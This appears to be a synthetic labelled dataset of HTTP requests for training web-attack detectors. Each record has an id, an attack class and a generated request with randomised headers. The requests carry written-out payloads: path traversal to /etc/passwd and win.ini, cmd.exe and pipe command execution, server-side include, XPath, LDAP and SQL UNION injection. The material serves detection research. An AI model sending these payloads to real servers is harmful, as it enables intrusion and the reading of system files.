Upgrade: eniw/0.3, sum/7.6, tRyoa/3.2, eolses/1.6
Warning: 482 65.238.5.101 "ois0cbedlccylrNmtRrg" "Sun, 04 Jun 06 04:15:57 GMT"
X-Forwarded-For: 77.201.61.163
X-Serial-Number: 7294579742813634
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36121
Start - Id: 45835
class: PathTransversal
GET /eS2xrAVYeq07QboLwUnG/adNoE3blrso8dug/rrD-Iyx5njG/CdrkN.exe?3ie51fg=..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&se8hmtbohw=cjKp&4Rlpxk2pw98C=dajf_RwiGl&qCXallu=erTvD-k6&XSxp=rma2ro+remratdc&ghenoaea=022399&tnt75eesu=stdS&nNJhxmlOby=749390&ErDESb3d=4qp1zdasbual&ghlthwl1=ciy00gbocet&l0so=683121&8ueen22rp=0&sj-maHf-26=394 HTTP/1.1
Host: www.09Ge.be
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.4, compress, gzip
Accept-Language: iSnLecwa-aplD;q=0.6
Cache-Control: only-if-cached
Client-ip: 103.226.207.78
Cookie: Nietdolveneaz=dtiotwgifr5xloNh
Cookie2: $Version="9"
Date: Wed, 07 Jul 04 01:30:30 GMT
ETag: "pcuOXffDgOU2k3R9Y"
Expect: tons32
From: ix4abcph@mnt9ssu.gov
If-Modified-Since: Sun, 06 Aug 06 08:42:43 UTC
If-Unmodified-Since: Thu, 15 Sep 05 05:10:13 UTC
If-Match: "ziEfDRGDlKnB.7Xb_W"
If-None-Match: "zXW-D.D90nzMt8qQ"
If-Range: *
Max-Forwards: 818
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.ncrl8sh.ch/2nled.asp
Authorization: Basic b3llM2loamk6dGUzb3Rhcw==
Range: -885841
Referer: /smSes/hh5sr/alexe/Atmsew.gz
TE: gzip;q=0.0,deflate;q=0.8,gzip;q=0.3
Trailer: Transfer-Encoding
User-Agent: 7iThta (jyXTTCwbP2)
UA-CPU: StrongARM
UA-Disp: 7854,570,8
UA-Color: color8
UA-Pixels: 861x425
Via: 9.8 245.231.3.126, 7.5 www.asb3t.jpg:55428
Transfer-Encoding: compress
Upgrade: idie/5.7, dunk/6.1, sib/2.4
Warning: 945 4.66.74.136 "n7nhehqedexmd" "Sat, 22 Aug 09 11:03:47 GMT"
X-Serial-Number: 25397478987579
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45835
Start - Id: 38673
class: LdapInjection
GET /5siahIsE3/H2WqM-IgX96u/rk@pNNegvTw0/7Q1g/Ulrlhigrb/sugqE0lrfPT-eLYxe/insCjgsol.ca5/0LU-DDhVY5OdG/qBattjajmXnhs/5ePhmoohhsed/rri8KQkR85G.tiff?huriltdeOfe9=nsris&t97n=2613480&7oroTeo=90&Rtns=75530&aioui3yigrQtu=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&raoa=ud83ddAe&lounlpkksd=t%27oicur8&0BSX=cp&hU7Gallwp-g@=er8bee2e7script&nslm3=0aAhndt%3Begett%24%7E&an7soie0iant=70613312 HTTP/1.1
Host: 28.19.91.93
Connection: close
Accept: text/*;q=0.2, application/rtf;q=0.1
Accept-Charset: cp-950;q=0.2, iso-8859-2, cp-950;q=0.7
Accept-Encoding: gzip
Accept-Language: Ruiak8ti-emwhe, l7a-ob, qzd-StejoF, eettheha-H;q=0.4
Cache-Control: no-store
Client-ip: 64.190.230.209
Cookie: tiiOt7hcr=ee\liwgetm)/tcmtogt;RYo2efhanA=461185629;9l=21277884;nldieiznc==delete7ilriah;t7eaeino=hs
Cookie2: $Version="33"
Date: Mon, 22 Dec 08 03:09:25 CET
ETag: W/"_hqGMwYxMtSHJo_E"
Expect: eees1
From: 0dbnE@pDEweao.biz
If-Modified-Since: Sun, 06 Feb 05 22:30:01 CET
If-Unmodified-Since: Mon, 01 Jun 09 12:39:01 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1898
MIME-Version: 9.7
Pragma: rehfi5='bn'
Proxy-Authorization: Basic ZTNpZGlzYzp0czFtb2VmYw==
Authorization: Basic ZHVlZTM0aG06ZnM4b2g=
Range: 39622-,-9614,-81153
Referer: /qorsed/nh6naySr/eoT7/pnAnte/aahr.css
TE: chunked;q=0.7
Trailer: Accept
User-Agent: Mozilla/4.6 (Windows; U; Windows NT 3.2; he-st; rv:0.3.3) Gecko/00936347
UA-Disp: 0550,3953,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 7709x7356
Via: 0ttldx/8.5 www.nbas.gif:67, ieboyl/1.3 www.gaetbtv.css:0266, FTP/9.6 119.211.27.200
Transfer-Encoding: compress
Upgrade: anRsj/9.4, 58agtG/6.3
Warning: 336 54.31.98.146 "tnyvIt9cmjd" "Tue, 01 Nov 05 06:51:51 UTC"
X-Forwarded-For: 0.228.238.16
X-Serial-Number: 4169159
----: -------------------

null

End - Id: 38673
Start - Id: 46422
class: PathTransversal
GET /izRgHxSIYWLkTcsF9R.5/havingYsLTp/vCyhvVq/NsYprocessing-instructioninput/wMnalwVGnVp_RHB47I/iktY89selectQLbnetcatksRcopy/ZAQQ4Oh-.gif?tmssts7aesd=jwM&ttloexiTrtaalbs=f+enopeno+i%28&0Ywp-B-M8jHl=914790&daqfed=2&Lom7iu=6338223&K8lpsXZf=Kphe&uyMitdc=%27%29%3F6&tsrepiaimla=ta&zeasPsce50lo=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&esen0jad=170&dumtddietamgt=06192339&5gohada=ts3%40T%40a7c&sayeeEtd4aesa=gqo&3gObkloN=+%7C HTTP/1.1
Host: www.e2a0utn.gov:76942
Connection: keep-alive
Accept: application/zip;q=0.7
Accept-Charset: x-mac-icelandic
Accept-Encoding: compress;q=0.4, gzip;q=0.2, deflate, gzip, identity
Accept-Language: Emanidi-ldre
Cache-Control: no-store
Client-ip: 46.225.127.162
Cookie: uy=r2vIA;frdth=em;yLVbmmail07=6;c5bzb@httpo7=wdtfIAswonrdsdnace;7hdnsm=je0;@NconnectExBF=KooiaLh
Cookie2: $Version="843"
Date: Sun, 29 Mar 09 01:21:56 GMT
ETag: "IY66ek_V0ngLo.jtW5A"
Expect: 100-continue
If-Modified-Since: Sat, 08 Apr 06 17:45:11 GMT
If-Unmodified-Since: Tue, 09 Nov 04 14:16:21 GMT
If-Match: *
If-None-Match: ".RpAnNR_VQY1BZ-HZE9"
If-Range: "oY.MRtACTt1v6CSmHV"
Max-Forwards: 4195
MIME-Version: 3.3
Pragma: pes='Jgt1rt'
Proxy-Authorization: Digest nonce
Authorization: NTLM ZW1laWhUYnNzRTJmZXB3c250aWV3c3NleXd6a2JwOHN3OW9ncw==
Range: 3341-,1-,7-
Referer: http://eg6yyaWt.fr/rtztumse/erojE/t1DEtcl.txt
TE: trailers,trailers
Trailer: Trailer
User-Agent: ew4n (ad5R@Z9)
UA-CPU: x86
UA-OS: FreeBSD
Via: 8.9 172.201.127.252, HTTP/7.0 www.hpeas2.tiff, HTTP/4.4 220.13.161.171:94352
Transfer-Encoding: identity
Upgrade: hsrO0/6.6, nTafmr/5.2, s8am/7.7, sIshn/6.2
Warning: 223 232.197.120.51 "npays3" "Wed, 14 Jun 06 02:27:53 UTC"
X-Forwarded-For: 242.103.195.112
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46422
Start - Id: 40887
class: SSI
GET /yWWsCZAOOLtP4eF5YGo.swf?TtsisniteeBhya=%3C%21--+%23odbc+++++connect%3D%22adi%2CrtNlf1%2Cs3CIn%22+++++++statement%3D%22select+++++*++from+hIbe%22--%3E&kbetweenilibadmincSG4=zYGsXjcCK_.r&rhy=ieeftp HTTP/1.0
Host: www.WiP1.ch
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 18.195.218.180
Cookie: D4hhnna6tgx=4076658244;xclohtoaafs=passwd ;1snnTien3rcH0=f0lK3Y;ctanrste6box=84989;z3tCnwise=emafauu;eireOUsO4ed=sock_streamroe
Cookie2: $Version="39"
Date: Fri, 06 Feb 04 01:20:08 CET
ETag: W/"cdUEMz1rdtb6L7v"
Expect: iu4peePa=sip9hx
From: iead0@nuqh1.org
If-Modified-Since: Wed, 23 Jul 08 14:12:04 UTC
If-Unmodified-Since: Wed, 12 Apr 06 15:17:29 GMT
If-Match: "x0_MVrX31f6q@-wpA.Me"
If-None-Match: "oVfTtr.6CxBgxzT"
If-Range: Sat, 15 Jan 05 02:24:26 CET
Max-Forwards: 4
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Basic dHQybmlKOmVtc3dzckFy
Authorization: NTLM dGRqYUlJdG5vODJuZW5kN25yaXR0c2FjQXJwaW90aWlyeHlyYXNpZXNza2lvSXNy
Range: 453-748
Referer: http://rcu3s.org/eBeNhlDr.tiff
TE: trailers
Trailer: Accept-Charset
User-Agent: 3tRudOige5oi2y
UA-CPU: x86
UA-Disp: 8926,1457,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5993x410
Via: HTTP/5.0 168.162.201.153:17786, 3.8 www.rs8c.html
Transfer-Encoding: tortcT
Upgrade: i72f/4.9, Zi2a/5.6, sifx9/9.1
Warning: 063 170.129.30.215:3080 "tttenlbdte1UerRsne1h" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 1967556980
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40887
Start - Id: 35637
class: XPathInjection
GET /3ECUq7FfBDEC/soAW.VaNZZZpS6/atetneE/oehmmynwarntH/w4ZQRl/aeXUIZlFt1G2.shtml?eIjuad7=u87n%27%5D++++%7C+P+%7C+%2F%2Fuser%5B+++name%2Ftext%28+%29+++%3D+++%27ud&sZdEa6rn=58009842&lemrbeu=47 HTTP/1.1
Host: 164.223.199.58
Connection: keep-alive
Accept: audio/*;q=0.5, image/png;q=0.0, video/*
Accept-Charset: big5
Accept-Encoding: deflate;q=0.8, gzip, compress, identity;q=0.3, compress
Accept-Language: uTr-hal4t, ltls-eefg
Cache-Control: bmrdbrp=miike
Client-ip: 69.177.219.175
Cookie: iheshd=xut3 mao;lkbsaDb7s=37709210;IcTG7optSN=tHnaimlhs;tz=a\)ol8nph-s dselectah:e
Cookie2: $Version="207"
Date: Thu, 11 Nov 04 20:39:52 UTC
ETag: W/"5joi@sl1CHdkS19bN3"
Expect: 100-continue
From: nenfl@ioddyed.it
If-Modified-Since: Sun, 11 Dec 05 07:30:52 GMT
If-Unmodified-Since: Thu, 04 Jan 07 17:01:45 UTC
If-Match: "@mJE_Mt4cyjZjSq"
If-None-Match: "eqCypgzeag9x73Ip"
If-Range: Wed, 03 Feb 10 04:29:02 GMT
Max-Forwards: 1
MIME-Version: 1.5
Pragma: h='onEeEth'
Proxy-Authorization: Digest opaque="snOLwi"
Authorization: NTLM RG9kY0lPanM3aGlpd1M2dGFvZ2kxaDRrbm0wdGVyY3Noc3Bobm56YmQ=
Range: -38,162-85,-031
Referer: /ast6l/ee4t.ace
TE: gzip,gzip,gzip;q=0.3
Trailer: Range
User-Agent: Mozilla/0.3 (compatible; MSIE 2.0; Windows NT; eistelu)
UA-CPU: Sparc
UA-Disp: 458,730,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 251x7424
Via: 9.0 www.9tts.jpeg:1, FTP/6.8 22.185.49.69
Transfer-Encoding: compress
Upgrade: e1e/4.3, eSaj/4.1, rweui/7.2
Warning: 083 51.53.107.61:3990 "ittpbttTz" "Fri, 23 May 08 24:15:13 GMT"
X-Forwarded-For: 246.53.246.66
X-Serial-Number: 587545
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35637
Start - Id: 46371
class: PathTransversal
GET /LW6DCRkf-e7/eenRtn/stdinIas%u/taldra56ee/hAoo3ozwoael7wpeae/jseooeola8heti/aB/7eziinj63qy3nf/fhssnny8tsn/waGsecrknehee/iSt/mtroS.shtml?lee5azlI=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&form.Bwindow.openEiframe9OinsertV=nn&tqdsmasn7=Xe%28%7C&Luiapre=eidwcdoq&wea0i=aZURz%40LucpQu&nanameOWhi=0843&seshwecy=3480&2Dsatmdtldoce=j HTTP/1.1
Host: 157.94.173.16
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: x-mac-ce;q=0.5, windows-1253;q=0.9, x-mac-cyrillic, iso-2022-kr;q=0.2, windows-1253;q=0.3
Accept-Encoding: 
Accept-Language: ohfhnub-o, jnl-e, ec-twt
Cache-Control: no-store
Client-ip: 214.183.248.166
Cookie: tmvE0=l1he;n9ht7Tsy2=299657;orlfjnrs=e1ihhomehvqSn/ andyro;n4rtudjLcw=)gapa
Cookie2: $Version="86"
Date: Sun, 20 Mar 05 15:38:54 UTC
ETag: "a@9jNiRlnfpt67xiMjl"
Expect: aegE=iobah
From: cewts@1fgr.fr
If-Modified-Since: Thu, 19 Jun 08 14:25:17 GMT
If-Unmodified-Since: Wed, 20 Aug 08 14:09:37 CET
If-Match: *
If-None-Match: "pcMMfBcBpW4B.Uakz"
If-Range: Mon, 20 Feb 06 10:41:47 GMT
Max-Forwards: 43
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: NTLM YWFHbUVzVWVJY2E0dmY0bHNybWVkbnJuUmJlMHNhamlobG8zdXM=
Authorization: Digest uri=http://iYet.net/eeyag9.jpg
Range: 2-1818,846125-
Referer: http://www.8cbo.ch/oaihat/NeSi51a/g3EtafeU.php4
TE: trailers,trailers,chunked
Trailer: From
User-Agent: Mozilla/1.5 (compatible; soogstlp1t; Linux i586; ce7l; r1t7osneha)
UA-CPU: StrongARM
UA-Disp: 4968,8587,8
UA-Color: color8
UA-Pixels: 3216x516
Via: HTTP/1.9 101.177.4.194, Iefdf/2.8 181.122.189.11, 7.4 116.127.38.140
Transfer-Encoding: compress
Upgrade: ls17ea/6.1, if8/2.6, eEewts/0.2, pvyt/8.4
Warning: 019 www.7IncbS.jpeg "Lwzurocdatoo" "Fri, 17 Apr 09 01:12:13 UTC"
X-Forwarded-For: 241.79.66.180
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46371
Start - Id: 48363
class: XPathInjection
GET /nh/ssdtrrwxuheIeea/pog/uz-iTeYVhP4OrVU.png? HTTP/1.1
Host: www.necltt.ch
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: ijI2L-e;q=0.8, aa-Hhhid9f, aeouCt-olsm2t6, Ueng-b;q=0.5, ynijeo-h
Cache-Control: no-cache
Client-ip: 204.16.216.80
Cookie: hzgsaiZ6=woa0t-irlgdecc7;slocationTdH3swhereWJ=31601073;htacces7zrYJ-0=sWS-l;tliv1r=fiLaehoublHiyoSe;sga=omi
Date: Sat, 18 Aug 07 16:08:37 CET
ETag: W/"fQmWw7eDu8Bmr7To-5_"
Expect: 100-continue
If-Unmodified-Since: Fri, 28 Dec 07 18:33:40 GMT
If-None-Match: "LHHEbbT1ZB4LTSL_"
If-Range: Sun, 31 Jul 05 11:11:05 GMT
Max-Forwards: 3
MIME-Version: 1.1
Pragma: no-cache
Authorization: Basic ZWFpbTpyZXFu
Referer: /utusOKuo/Nsek/Bysoe/ebpeszTl/nopnh.php
TE: trailers
Trailer: User-Agent
User-Agent: wigves' or  6 <     count(path/child::*)     or 'dpaf'  =    '
UA-CPU: PowerPC
Via: 6.8 100.174.240.5, dsoo/7.0 www.7d7e.htm
Transfer-Encoding: compress
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48363
Start - Id: 44948
class: PathTransversal
GET /AB/sy/rPzKOBa/rcTJK_/nyZa6/98n6S/gdcuem/uOps@.css?eMreldhIrscry=mrdlnwltcvo&nejc7dI5fny=pS&ueaeiTeth=83&nY_7bWHaPRTX=file%3A%2F%2F%2Fs%3A%2Fano96%2Flbm2t%2Fesnomf.xml&chyeayolnsua=ahn HTTP/1.0
Host: www.0iedSj.biz
Connection: keep-alive
Accept: image/png;q=0.5
Accept-Charset: x-mac-ce, iso-8859-7, windows-1258;q=0.9, cp-936;q=0.8
Accept-Encoding: gzip, gzip;q=0.4, compress;q=0.8, identity, gzip
Accept-Language: 8-w6hs
Cache-Control: no-cache
Client-ip: 199.211.182.175
Cookie: fQallHzrQ1H=81755;oawinQuswsng=36812184
Cookie2: $Version="9"
Date: Sat, 30 May 09 24:53:29 GMT
ETag: W/"wJvKQt1.0rl.z_JGAdW3"
Expect: dknlhEn
From: idto@ug5qpuenx6.org
If-Modified-Since: Tue, 20 Apr 04 21:12:06 CET
If-Unmodified-Since: Fri, 13 Apr 07 16:05:22 GMT
If-Match: "H8pOxIKF7SrzXkmZg"
If-None-Match: *
If-Range: *
Max-Forwards: 458
MIME-Version: 8.4
Pragma: hpe=ehey
Proxy-Authorization: Digest response="cFbf2F57cDDF4E7Ed19bE92BCEa0ec12"
Authorization: Digest response="837A67CfDCBE3eE4e2Af364Ae77DAa7D"
Range: 032407-30
Referer: http://Eeht.gov/ahtoa/e4a7/no7eh/eIce.rar
TE: trailers,trailers
Trailer: Referer
User-Agent: Mozilla/3.2 (Windows; U; WinNT 4.3; to-ju; rv:4.5.2) Gecko/73240476
UA-CPU: PowerPC
UA-Disp: 8355,9239,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 2762x370
Via: 5.4 www.Jtier.tiff, rRstat/1.6 www.hoasnks1.jpeg
Transfer-Encoding: gzip
Upgrade: sSAynh/2.0, tnEo/3.3, jo1wa/2.9
Warning: 619 65.227.235.2 "te2tns3h" "Fri, 05 Sep 08 07:18:21 CET"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 26239729900877789790
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44948
Start - Id: 39823
class: SSI
GET /sque3YKY/hh4ogiioose/ti@YBUY/uxlsWWlSd9Ah3l36tycF/tk6yteybroH/e5mRFNE/ooous/aUZ/P-siBXTj/d8vKsK2oVy.xRldyo/Zu.css?8hNeLrrHaih=8ennOZt8yhttpshdstd&1eigceh=%3C%21--++%23include+++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22++++--%3E&vvtot8de=14&2e=1600&gzSiau=Olnt HTTP/1.0
Host: www.a0otnoiaw.ch
Connection: 03rj
Accept: text/*, video/*;q=0.8
Accept-Charset: iso-8859-2;q=0.9, cp-936, iso-8859-1, koi8-r, big5;q=0.9
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 179.116.196.3
Cookie: czldkhtwmme=lwvfVna;qkctsceoodT=hsH;bi=3XFrHH8H;sh=oNnr
Cookie2: $Version="15"
Date: Mon, 28 Sep 09 15:05:17 UTC
ETag: "nh-L3-xB8cm82HcCivd"
Expect: rsGesn
From: fEkbo16t@uycIttryA.biz
If-Modified-Since: Sat, 08 Jan 05 23:16:06 GMT
If-Unmodified-Since: Sat, 01 Nov 08 02:31:46 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 20 Feb 06 11:29:02 UTC
Max-Forwards: 7
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Basic aWJlejJFUGk6dWVibGV3
Authorization: taxs reahho=t9eaicne
Range: 40-,-909,-0651
Referer: /fiT1e/mrffoAze/s8F8.pl
TE: trailers,gzip,trailers
Trailer: Accept-Encoding
User-Agent: 18eaApw
UA-CPU: Sparc
UA-Disp: 052,114,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 9632x079
Via: 9.4 232.33.104.2, FTP/0.7 87.1.80.182:9
Transfer-Encoding: deflate
Upgrade: oLt/5.9, tEgb/6.9, 6laet/2.7, faare2/0.4, vst20/6.5
Warning: 236 www.per1iyt.gif "ivlawmebhs44spsee" "Sun, 20 Sep 09 12:22:58 GMT"
X-Forwarded-For: 142.194.73.31
X-Serial-Number: 408744625517883
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39823
Start - Id: 36588
class: OsCommanding
GET ..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.mayhIss1g.gov
Connection: aotSl
Accept: audio/basic, audio/x-wav, text/*
Accept-Charset: utf-8, iso-8859-6, iso-8859-8-i;q=0.5, shift_jis;q=0.1
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.3
Cache-Control: hrs='tenudssA'
Client-ip: 88.241.103.90
Cookie: tfcbiaeolEm=aIoar~n;lpo0QOKe9tsF=2;kx6s=oirofsdtotow;6e=csv
Cookie2: $Version="05"
Date: Sat, 10 Nov 07 08:08:05 GMT
ETag: W/"ii87XQjje42GUbBHrDr"
Expect: anatrtq
From: oAud4eo@aM6ymuu.de
If-Modified-Since: Thu, 26 Mar 09 02:12:14 UTC
If-Unmodified-Since: Sun, 17 Sep 06 13:13:29 UTC
If-Match: "sjzbDPggXqFv7mTRp"
If-None-Match: "jUpFmEEN-J_DlhUFJX3c"
If-Range: "YkdFyFmR4vc.Sz8ebw"
Max-Forwards: 5915
MIME-Version: 1.8
Pragma: t1ta=gonilEa
Proxy-Authorization: Basic em9lZ2xJOmVoVWUzcmpO
Authorization: NTLM QWlyQnJpcGRlYWlSYWFla254emFpZzFkaGRjcXN0ZG9odXRsZXlocm5BZQ==
Range: -5
Referer: http://ee8l2.com/eeeo/etai.dll
TE: trailers,trailers,trailers
Trailer: Referer
User-Agent: rOo2wNKHU http://www.e4avUton.uk
UA-CPU: MIPS
UA-Disp: 380,5893,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: 5.8 85.216.148.175
Transfer-Encoding: weytp; aa4iwne=on7I4ht
Upgrade: ldezE/3.1, ieuhio/3.5, vasgc/3.8, trl4e/6.5
Warning: 611 www.lnn5olje.js "lioehd4dehdsc3y" 
X-Forwarded-For: 50.37.241.255
X-Serial-Number: 35669547632
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36588
Start - Id: 36607
class: OsCommanding
GET /cgi-local/alibaba.pl|dir ..\\..\\..\\..\\..\\..\\..\\,? HTTP/1.0
Host: 22.167.93.200
Connection: ebdreds4
Accept: */*;q=0.3
Accept-Charset: *;q=0.7
Accept-Encoding: compress, gzip;q=0.4
Accept-Language: lfo-0tsaruw, sttnr-y
Cache-Control: no-cache
Client-ip: 34.3.142.249
Cookie: iaBoetld=g:r/t;senbh=60176188;e2nle=hsde6 ] @n@6h0d?m8l
Cookie2: $Version="9"
Date: Thu, 22 Mar 07 24:53:46 CET
ETag: "EQO6XZqhgp6eucuyMd-9"
Expect: 100-continue
From: CmaD@nstapeung.st
If-Modified-Since: Thu, 29 Sep 05 18:53:19 UTC
If-Unmodified-Since: Mon, 08 Feb 10 10:00:09 CET
If-Match: *
If-None-Match: "y3-OKVTeDdF14ozbiQ9"
If-Range: Tue, 04 Apr 06 01:21:17 GMT
Max-Forwards: 93
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Basic RWViaWU6ZWh6c3JkYw==
Authorization: NTLM dHNzNWtjNDMxaWVsZXNpdG9sY3NueGxjc3NpZHJ1dHJ0OWE5b3Q=
Range: 017729-
Referer: http://o6uoynt.it/limoyoqe/eatIdn/hcrjdggd.asmx
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/1.0 (Machintosh; U; PPC Mac OS X 8.6; en-ee; rv:7.0.0) Gecko/41289894
UA-CPU: MIPS
UA-Disp: 1925,168,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: 8.0 44.192.193.9, FTP/2.8 www.wdi17E.png
Transfer-Encoding: compress
Upgrade: uof/2.1, pIto/5.6, Weac/8.2, o0shyf/1.7
Warning: 933 www.oecji.html "M3c95ra8" "Thu, 10 Dec 09 13:28:45 UTC"
X-Forwarded-For: 2.248.231.30
X-Serial-Number: 0686987
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36607
Start - Id: 45098
class: PathTransversal
GET /error/\..\..\..\..\winnt\win.ini? HTTP/1.0
Host: 220.165.202.78
Connection: 8lsqr
Accept: image/gif;q=0.0, text/xml
Accept-Charset: x-mac-greek, windows-1258, iso-8859-8;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 217.208.54.150
Cookie: 6fofT3ben=gqQo1;ea1smudacAs=rmOwTnha3dt 
Cookie2: $Version="8"
Date: Fri, 18 May 07 19:36:37 UTC
ETag: "NeIswK_7a5EBHO2LNI"
Expect: 100-continue
From: hlsgr2q@lokeQ.ch
If-Modified-Since: Sun, 21 Mar 04 21:14:23 UTC
If-Unmodified-Since: Tue, 18 Mar 08 17:40:36 UTC
If-Match: "@qTsqfeb1mDFCco"
If-None-Match: *
If-Range: Thu, 03 Sep 09 08:05:08 UTC
Max-Forwards: 2
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Basic TnBudDpyclRlRWhl
Authorization: Basic T2UzdHNiZUw6ZXN2NnVT
Range: -5066,55373-
Referer: http://rsiibysn.cz/hotahab/m8tt4s/EsNdeh.jpg
TE: gzip;q=0.6,trailers
Trailer: Connection
User-Agent: nor5shRid (ebCzbjs; hIvOz0vep.; sVAZJRukm; rN@BVdJSx)
UA-CPU: StrongARM
UA-Disp: 4629,539,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 213x015
Via: 2.0 91.186.196.32
Transfer-Encoding: gzip
Upgrade: ud4hrt/2.8, ifephn/3.0, adtIIr/9.5, oHsuT3/8.9
Warning: 131 165.136.34.196 "tchbajdsaa" "Fri, 12 Mar 10 18:52:44 CET"
X-Forwarded-For: 101.164.70.181
X-Serial-Number: 888948293
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45098
Start - Id: 45252
class: PathTransversal
GET ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////? HTTP/1.0
Host: 202.74.155.219
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: iso-8859-2;q=0.0, cp-950
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=44
Client-ip: 225.124.231.31
Cookie: hyTyuWttp=thye8nawtns?/3l;xQFSW=+rEgpisock_streamoa
Cookie2: $Version="34"
Date: Sun, 15 Feb 04 16:18:31 CET
ETag: W/"WwBzXh8xm.-wLrDVv"
Expect: nT6mf=6igw
From: 77tu@22noeois.uk
If-Modified-Since: Thu, 03 Feb 05 21:02:34 GMT
If-Unmodified-Since: Thu, 07 Jul 05 01:04:26 UTC
If-Match: *
If-None-Match: "ZnGQD8BYj2k0iDd9UR"
If-Range: *
Max-Forwards: 6162
MIME-Version: 1.7
Pragma: sli=lctxBCei
Proxy-Authorization: Digest qop=evai40
Authorization: NTLM dW1rMjB2bWFFaDNlbm50dWUycnJyc2FhYWJzdGllbGZycjhtZzllbHRoNG1lZQ==
Range: 9049-,922186-
Referer: /rycecEct.swf
TE: deflate,trailers,deflate;q=0.1
Trailer: Accept
User-Agent: Mozilla/8.9 (Machintosh; U; PPC 8.8; ah-gr; rv:8.9.9) Gecko/30506857
UA-CPU: x86
UA-Disp: 711,6058,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2272x045
Via: 8.8 232.43.46.142
Transfer-Encoding: identity
Upgrade: b9r/9.4
Warning: 831 www.rueghla.htm "ecA7eejeodtti" 
X-Forwarded-For: 181.253.151.130
X-Serial-Number: 67855229
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 45252
Start - Id: 42449
class: SqlInjection
GET /8wtionmrot7tTaas0zts/S@ZbS0/osaaeiiocuSn3qnre/ADUTjfinsertd5HpREY/tobh2qV03IE_txNX-.htm?fI0UTG=551&iFnd=043&la=lbehe4ucuD&oaHa9ssshekta=3045730&ac1repjYtas6iz0=%27+%29++UNION+++ALL++++SELECT+++t9obay++++%2C+yhndscLe+++%2C+++haeseh++++FROM+++++6he6++++WHERE+++p8ste++NOT+++IN++++%28+%27two0ssos%27%29+++++AND++ante++++NOT+++IN+++++%28+++%27oaagft%27++%29+++AND+++++%27%27++%3D%27&p8rpersAeei4wy=j%40U HTTP/1.1
Host: www.mbihyfoeI.gov
Connection: njg9
Accept: application/x-tar;q=0.2
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: d8Ht-libir5;q=0.2, oaa-notrUur, A-o1e
Cache-Control: only-if-cached
Client-ip: 220.25.102.83
Cookie: cdopennin=Fkobjectk;Duftb6=173
Cookie2: $Version="574"
Date: Sun, 18 Jun 06 07:33:58 GMT
